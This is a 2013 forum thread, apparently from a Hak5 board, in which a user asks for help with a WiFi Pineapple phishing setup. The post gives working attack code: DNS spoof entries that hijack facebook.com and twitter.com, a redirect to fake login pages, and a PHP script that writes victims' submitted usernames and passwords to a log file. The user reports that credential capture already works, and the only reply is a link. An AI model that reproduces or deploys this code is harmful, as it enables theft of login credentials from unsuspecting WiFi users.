Jaden Posted March 22, 2013 Share Posted March 22, 2013 I have more issues with my wifi pineapple right now then Kate Upton doing more cat daddy dances on the internet. Which incase you haven't seen them... MEOW!! Anyway, Issue numero uno Ive been playing around with phishing and so far so good. I can get the sites up and running, my credencials are being captured through the pineapple. Life with my pineapple under the sea is good. However, I am unable to allow other web pages to pass through. Ive added my scripts below incase there was something missing. Issue number 2 This may tie back to the first issue above BUT once I test my page and enter my login, it just refreshes the page and does not take me to my actual facebook or twitter page. This may have something to do with not being able to access other sites. I have read all posts with phishing tagged and while I feel pretty informed about other topics, none really captured this. Any help would be great. Thanks. Lastly in an unrelated topic, what do you think about DJaden as an online alias? for Digital-Jaden. It could also be DJ-Aden incase I decide to pick up DJ-ing as a career. In all seriousness I'm pretty stuck on my pineapple issue. :D DNS SPOOF 172.16.42.1 facebook.com 172.16.42.1 *.facebook.com 172.16.42.1 twitter.com172.16.42.1 *.twitter.com LANDING PAGE <html> <head> <meta http-equiv="REFRESH" content="0;url=redirect.php"> </head> <body> </body></html> REDIRECT <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "facebook")){ header('Status: 302 Found'); header('Location: facebook.html'); } if (strpos($ref, "twitter")){ header('Status: 302 Found'); header('Location: twitter.html'); } require('error.php'); ?> ERROR <?php $ref = $_SERVER['HTTP_REFERER']; $today = date("F j, Y, g:i a"); if (isset($_POST['name']) && !empty($_POST['name'])) { $nam = stripslashes($_POST['name']); $pas = stripslashes($_POST['pass']); $nam = htmlspecialchars($nam, ENT_QUOTES); $pas = htmlspecialchars($pas, ENT_QUOTES); $content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas; $filed = @fopen("/pineapple/logs/phish.log", "a+"); @fwrite($filed, "$content\n"); @fclose($filed); } ?> <html><head> <script type="text/javascript"> function goBack() { window.history.back() } </script> </head> <body onload="goBack()"></body></html> Link to comment Share on other sites More sharing options...
Mr-Protocol Posted March 22, 2013 Share Posted March 22, 2013 http://forums.hak5.org/index.php?/topic/28813-psa-phishing-pages/ Link to comment Share on other sites More sharing options...
Recommended Posts